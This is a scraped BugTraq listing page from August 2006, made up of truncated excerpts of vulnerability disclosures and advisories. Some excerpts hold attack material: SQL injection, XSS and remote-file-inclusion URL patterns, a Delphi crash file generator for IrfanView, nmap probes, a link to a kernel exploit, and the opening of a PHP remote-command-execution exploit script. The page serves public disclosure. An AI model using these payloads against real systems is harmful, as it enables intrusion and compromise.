BugTraq
osDate 1.1.8 - Multiple HTML Injection Vulnerability - fixed 2006-08-13
vijay nairvijay com
Hi,

The bug as reported in thread 19034 is fixed in the version osDate 1.1.8.

Thanks

Vijay

Re: Re: TSRT-06-02: Microsoft SRV.SYS Mailslot Ring0 Memory Corruption Vulnerability 2006-08-14
mr simla colostate edu
i can confirm for windows xp, fully patched... initially i tried this from

http://www.security.nnov.ru/files/mswinmailslotex.c

same exploit, but from a different site. but i think it exploits the same, or very similar vulnerability to MS06-040.

Multiple Password Exposures Flaws 2006-08-14
NGSSoftware Insight Security Research (nisr nextgenss com)
NGSSoftware Insight Security Research Advisory

Name: Multiple Password Exposures Flaws
Systems Affected: All versions of Informix
Severity: High
Vendor URL: http://www.ibm.com/
Author: David Litchfield [ davidl (at) ngssoftware (dot) com [email concealed] ]
Date of Public Advisory: 2nd August 2006
Advisory number: #NISR0208200

Local privilege Escalation in SmartLine DeviceLock 5.73 2006-08-13
seppi seppig de
The vulnerability consists of wrong ACLs on Device Object permission set by the driver.

Whenever your ACLs on a harddrive or partition, as configured by DeviceLock Manager, only consist of Allow entries (and Deny being the default), then the driver sets the ACLs on the kernel's internal objec

Unauthorized Database Creation Privilege on Informix 2006-08-14
NGSSoftware Insight Security Research (nisr nextgenss com)
NGSSoftware Insight Security Research Advisory

Name: Unauthorized Database Creation Privilege on Informix
Systems Affected: 9.40.xC6 and earlier and 10.00.xC2, C1
Severity: High
Vendor URL: http://www.ibm.com/
Author: David Litchfield [ davidl (at) ngssoftware (dot) com [email concealed] ]
Date of Public Advisory: 2nd August 2

Technical note: under some conditions, it's possible to steal HTTP credentials using Flash 2006-08-14
Amit Klein (AKsecurity) (aksecurity hotpop com)
Technical note: under some conditions, it's possible to steal HTTP credentials using Flash
(requires IE + some transparent proxies or virtual hosting)

The method described here is pretty simple. It works
though only on HTTP (not HTTPS) credentials. Also, it
works only when the client browses (usi

IrfanView 3.98 (with plugins) - Access violation at processing images CUR files 2006-08-12
sehato yandex ru
Example (in Delphi):

===============cur.dpr===============
program cur;
{$APPTYPE CONSOLE}
const
  FileName='file.cur';
  Len=6;
  // 6-byte icon directory header: reserved=0, type=1, image count=0
  Buf=#$00#$00#$01#$00#$00#$00;
var
  F:File;
begin
  AssignFile(F,FileName);
  Rewrite(F,1);
  BlockWrite(F,Buf,Len);
  CloseFile(F);
end.
=============

Multiple Arbitrary Command Execution Vulnerabilities 2006-08-14
NGSSoftware Insight Security Research (nisr nextgenss com)
NGSSoftware Insight Security Research Advisory

Name: Multiple Arbitrary Command Execution Vulnerabilities
Systems Affected: All versions of Informix
Severity: High
Vendor URL: http://www.ibm.com/
Author: David Litchfield [ davidl (at) ngssoftware (dot) com [email concealed] ]
Date of Public Advisory: 2nd August 2006
Advisory n

Arbitrary Library Loading in Informix 2006-08-14
NGSSoftware Insight Security Research (nisr nextgenss com)
NGSSoftware Insight Security Research Advisory

Name: Arbitrary Library Loading in Informix
Systems Affected: All versions of Informix
Severity: High
Vendor URL: http://www.ibm.com/
Author: David Litchfield [ davidl (at) ngssoftware (dot) com [email concealed] ]
Date of Public Advisory: 2nd August 2006
Advisory number: #NISR020

Wordpress WP-DB Backup Plugin Directory Traversal Vulnerability 2006-08-14
ss_team (ssteam pl gmail com)
Hi all,

Software: WP-DB Backup Plugin for Wordpress

Homepage: http://www.skippy.net/blog/category/wordpress/plugins/wp-db-backup/

Description:
WP-DB Backup is vulnerable to directory traversal attack.
You must have administrator rights in the wordpress blog to exploit
this vulnerability.

PoC:
ht

Kaspersky Anti-Hacker personal firewall unstealthy stealth mode 2006-08-12
tbratusa gmail com
Kaspersky personal firewall 1.8.180 in "stealth mode" configuration doesn't detect nor block timestamp and network block ICMP request. They still call it a stealth mode feature, yeah sure ;)

Try: nmap -sP -PE <IP>

nmap -sP -PM <IP>

HPSBMA02138 SSRT061184 rev.1 - HP OpenView Storage Data Protector, Remote Arbitrary Command Execution 2006-08-14
security-alert hp com
SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00742778
Version: 1

HPSBMA02138 SSRT061184 rev.1 - HP OpenView Storage Data Protector,
Remote Arbitrary Command Execution

NOTICE: The information in this Security Bulletin should be acted upon

JavaScript get Internal Address (thanks to DanBUK) 2006-08-12
pdp (architect) (pdp gnucitizen googlemail com)
http://www.gnucitizen.org/projects/javascript-address-info
http://f-box.org/~dan/jstest.html

The following technique was brought to me by DanBUK
(http://f-box.org/~dan/). Dan managed to find the internal IP address
of the visiting client by establishing a socket between local host and
the remote we

Virtual War v1.5.0 SQL injection and XSS 2006-08-14
vampire_chiristof yahoo com
Virtual War v1.5.0 SQL injection and XSS

http://[host]/vwar/war.php?s=[SQL]
http://[host]/vwar/war.php?page=[SQL]or[xss]
http://[host]/vwar/war.php?showgame=[SQL]
http://[host]/vwar/war.php?sortby=[sql]
http://[host]/vwar/war.php?sortorder=[sql]
http://[host]/vwar/calendar.php?year=[xss]

v

BlaBla 4U XSS Vulnerability 2006-08-14
vampire_chiristof yahoo com
BlaBla 4U XSS Vulnerability

vendor :

http://www.blabla4u.com

http://www.Host.com/trial.php?product=[XSS]

http://www.Host.com/[patch]/ForumsII.asp?ForumID=[XSS]

Discovered by Vampire

connect me :vampire_chiristof (at) yahoo (dot) com [email concealed]

XMB <= 1.9.6 Final basename()/'langfilenew' arbitrary local inclusion / remote commands execution 2006-08-13
rgod autistici org
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "XMB <= 1.9.6 Final basename() 'langfilenew' arbitrary local inclusion / remote commands xctn\n";
echo "by rgod rgod (at) autistici (dot) org [email concealed]\n";
echo "site: http://retrogod.altervista.org\n";
echo "dork: \"Powered by XMB\"\n\n";
/*
works regardless of ph

SQLIDEBUG envariable overflow on Informix 2006-08-14
NGSSoftware Insight Security Research (nisr nextgenss com)
NGSSoftware Insight Security Research Advisory

Name: SQLIDEBUG envariable overflow on Informix
Systems Affected: 9.40.xC6 and earlier and 10.00.xC2, C1
Severity: High
Vendor URL: http://www.ibm.com/
Author: David Litchfield [ davidl (at) ngssoftware (dot) com [email concealed] ]
Date of Public Advisory: 2nd August 2006
Advisor

Google Picasa Listening on Port 80? 2006-08-11
Geoff Vass (geoff cadzow com au)
I'm using Picasa 2.5 Beta (32.43), and I notice from Sysinternals'
TCPVIEW app that it is listening on port 80. So I fire up the browser,
and sure enough, http://localhost returns a blank page. When I close
Picasa, the browser returns "The page cannot be displayed".

What a great idea, a user-mode g

[ECHO_ADV_45$2006] WEBinsta CMS 0.3.1 (templates_dir) Remote File Inclusion Vulnerability 2006-08-14
erdc echo or id
ECHO_ADV_45$2006

-----------------------------------------------------------------------------------------

[ECHO_ADV_45$2006] WEBinsta CMS 0.3.1 (templates_dir) Remote File Inclusion Vulnerability

-----------------------------------------------------------------------------------------

Autho

Re: Mafia Moblog <= 6 (pathtotemplate) Remote File Inclusion Vulnerability 2006-08-11
noname nodomain com
(please remove this bid : 19458)

Mafia Moblog isn't vulnerable.

why ?!

Exploit of Mafia is here :

http://www.example.com/[Mafia Moblog]/big.php?pathtotemplate=[Evil Script]

in big.php we have :

<?php
include("info.php");
include("template.php");
if (file_exists("$pathtotemplate/includes.php

Error logging buffer overflow in Informix 2006-08-14
NGSSoftware Insight Security Research (nisr nextgenss com)
NGSSoftware Insight Security Research Advisory

Name: Error logging buffer overflow in Informix
Systems Affected: Informix 9.40.xC7 and xC8, 10.00.xC3 and xC4
Severity: Critical
Vendor URL: http://www.ibm.com/
Author: David Litchfield [ davidl (at) ngssoftware (dot) com [email concealed] ]
Date of Public Advisory: 2nd August 20

Copyright 2010, SecurityFocus